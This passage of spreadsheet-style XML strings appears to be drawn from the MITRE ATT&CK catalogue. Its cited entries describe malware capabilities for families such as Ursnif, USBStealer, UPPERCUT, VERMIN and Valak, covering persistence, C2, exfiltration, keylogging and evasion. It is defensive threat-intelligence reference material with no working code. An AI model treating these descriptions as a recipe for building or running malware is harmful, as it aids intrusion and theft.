    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can take a desktop screenshot and save the file into &lt;code&gt;\ProgramData\Mail\MailAg\shot.png&lt;/code&gt;.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can capture information regarding the victim's OS, security, and hardware configuration.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information on the network configuration of a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [netstat](https://attack.mitre.org/software/S0104) to collect a list of network connections.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can inject a suspended thread of its own process into a new process and initiate via the &lt;code&gt;ResumeThread&lt;/code&gt; API.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can communicate with C2 via HTTP POST requests.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Karagany](https://attack.mitre.org/software/S0094) can perform reconnaissance commands on a victim machine via a cmd.exe process.(Citation: Secureworks Karagany July 2019)</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) performs BIOS modification and can download and execute a file as well as protect itself from removal.(Citation: Ge 2011)</t>
  </si>
  <si>
    <t>To establish persistence, [Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) adds a Registry Run key to establish persistence.(Citation: Microsoft Win Defender Truvasys Sep 2017)</t>
  </si>
  <si>
    <t>[UACMe](https://attack.mitre.org/software/S0116) contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) takes advantage of the /SetNotifyCmdLine option in [BITSAdmin](https://attack.mitre.org/software/S0190) to ensure it stays running on a system to maintain persistence.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used GitHub and a public blog service in Hong Kong for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can upload and download files to the victim’s machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) encrypts instructions in the payload using a simple XOR cipher.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can list running processes on the system.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) has used HTTP for C2 communications.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UBoatRAT](https://attack.mitre.org/software/S0333) can start a command shell.(Citation: PaloAlto UBoatRAT Nov 2017)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's current directory.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can download and upload files to and from the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) can capture desktop screenshots in the PNG format and send them to the C2 server.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>Some versions of [UPPERCUT](https://attack.mitre.org/software/S0275) have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the system’s hostname and OS version.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to gather the victim's proxy information.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to collect the current logged on user’s username from a machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has the capability to obtain the time zone information and current timestamp of the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) uses cmd.exe to execute commands on the victim’s machine.(Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>For all non-removable drives on a victim, [USBStealer](https://attack.mitre.org/software/S0136) executes automated collection of certain files for later exfiltration.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Once a removable media device is inserted back into the first victim, [USBStealer](https://attack.mitre.org/software/S0136) collects data from it that was exfiltrated from a second victim.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) exfiltrates collected files via removable media from air-gapped victims.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) has several commands to delete files associated with the malware from the victim.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) searches victim drives for files matching certain extensions (“.skr”,“.pkr” or “.key”) or names.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.(Citation: ESET Sednit USBStealer 2014)(Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) mimics a legitimate Russian program called USB Disk Security.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>Most strings in [USBStealer](https://attack.mitre.org/software/S0136) are encrypted using 3DES and XOR and reversed.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) registers itself under a Registry Run key with the name "USB Disk Security."(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.(Citation: ESET Sednit USBStealer 2014)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can collect information from an air-gapped host machine.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can detect the victim's file or folder list.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net user&lt;/code&gt; to gather information about local accounts.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can check for connected USB devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;tasklist&lt;/code&gt; to gather information about the process running on the infected system.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net view&lt;/code&gt; to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can copy its installer to attached USB storage devices.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can execute rundll32.exe in memory to avoid detection.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can detect the infected machine's network topology using &lt;code&gt;ipconfig&lt;/code&gt; and &lt;code&gt;arp&lt;/code&gt;.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;nbtstat&lt;/code&gt; to detect active network connections.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) can execute various Windows commands.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) creates valid local users to provide access to the system.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access to the system via SSH or any other protocol that uses PAM to authenticate.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Umbreon](https://attack.mitre.org/software/S0221) provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet(Citation: Umbreon Trend Micro)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of stealing usernames and passwords from browsers on the victim machine.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of downloading remote files.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of recording keystrokes.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is capable of spreading to USB devices.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim computer name, physical memory, country, and date.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim's IP address.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) can obtain information about the victim usernames.(Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010).(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) uses a custom packer.(Citation: Symantec Waterbug)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM objects to execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used encoded data in HTTP URLs for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has collected files from victim machines, including certificates and cookies.(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a DGA to generate domain names for C2.(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTP POSTs to exfil gathered information.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has deleted data staged in tmp files after exfiltration.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM properties to execute malware in hidden windows.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has dropped payload and configuration files to disk. [Ursnif](https://attack.mitre.org/software/S0386) has also been used to download and execute additional payloads.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used tmp files to stage gathered information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected HTML codes into banking sites to steal sensitive online banking information (ex: usernames and passwords).(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry modifications as part of its installation routine.(Citation: TrendMicro BKDR_URSNIF.SM)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Tor](https://attack.mitre.org/software/S0183) for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used &lt;code&gt;CreateProcessW&lt;/code&gt; to create child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used an XOR-based algorithm to encrypt Tor clients dropped to disk.(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) droppers have also been delivered as password-protected zip files that execute base64 encoded [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running processes.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used process hollowing to inject into child processes.(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a peer-to-peer (P2P) network for C2.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Reg](https://attack.mitre.org/software/S0075) to query the Registry for installed programs.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used Registry Run keys to establish automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected removable drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used hooked APIs to take screenshots.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro BKDR_URSNIF.SM)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather system information.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has gathered information about running services.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has copied itself to and infected files in network drives for propagation.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has injected code into target processes via thread local storage callbacks.(Citation: TrendMicro Ursnif Mar 2015)(Citation: TrendMicro PE_URSNIF.A2)(Citation: FireEye Ursnif Nov 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used a 30 minute delay after execution to evade sandbox monitoring tools.(Citation: TrendMicro Ursnif File Dec 2014)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used VBA macros to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has used HTTPS for C2.(Citation: TrendMicro Ursnif Mar 2015)(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) droppers have used WMI classes to execute [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.(Citation: Bromium Ursnif Mar 2017)</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) has registered itself as a system service in the Registry for automatic execution at system startup.(Citation: TrendMicro PE_URSNIF.A2)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to complicate forensic analysis by deleting all the files contained in &lt;code&gt;%APPDATA%\..\Local\Temporary Internet Files\Content.Word&lt;/code&gt; and &lt;code&gt;%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to download VBS files to the target computer.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) used &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8}&lt;/code&gt; to maintain persistence.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) has attempted to obtain a VBS script from command and control (C2) nodes over HTTP.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) encrypts the collected files using 3-DES.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform audio capture.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects data stored in the clipboard.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) decrypts code, strings, and commands to use once it's on the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can delete files on the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can download and upload files to the victim's machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects keystrokes from the victim machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is obfuscated using the obfuscation tool called ConfuserEx.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can get a list of the processes and running tasks on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) can perform screen captures of the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses WMI to check for anti-virus software installed on the system.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is initially packed.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) collects the OS name, machine name, and architecture information.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the local IP address.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) gathers the username from the victim’s machine.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) uses HTTP for C2 communications.(Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download a module to search for and build a report of harvested credential data.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to decode and decrypt downloaded files.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate domain admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to exfiltrate data over the C2 channel.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can communicate over multiple C2 hosts.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has downloaded a variety of modules and payloads to the compromised host, including [IcedID](https://attack.mitre.org/software/S0483) and NetSupport Manager RAT-based malware.(Citation: Unit 42 Valak July 2020)(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate local admin accounts.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been executed via Microsoft Word documents containing malicious macros.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to modify the Registry key &lt;code&gt;HKCU\Software\ApplicationContainer\Appsw64&lt;/code&gt; to store information regarding the C2 server and downloads.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can download additional modules and malware capable of using separate C2 channels.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to base64 encode and XOR encrypt strings.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used PowerShell to download additional modules.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to enumerate running processes on a compromised host.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use the Registry for code updates and to collect credentials.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used &lt;code&gt;regsvr32.exe&lt;/code&gt; to launch malicious DLLs.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Valak](https://attack.mitre.org/software/S0476) has the ability to take screenshots on a compromised host.(Citation: Cybereason Valak May 2020)  </t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine if a compromised host has security products installed.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can determine the Windows version and computer name on a compromised host.(Citation: Cybereason Valak May 2020)(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has the ability to identify the domain and the MAC and IP addresses of an infected machine.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can gather information regarding the user.(Citation: Cybereason Valak May 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) has used HTTP in communications with C2.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
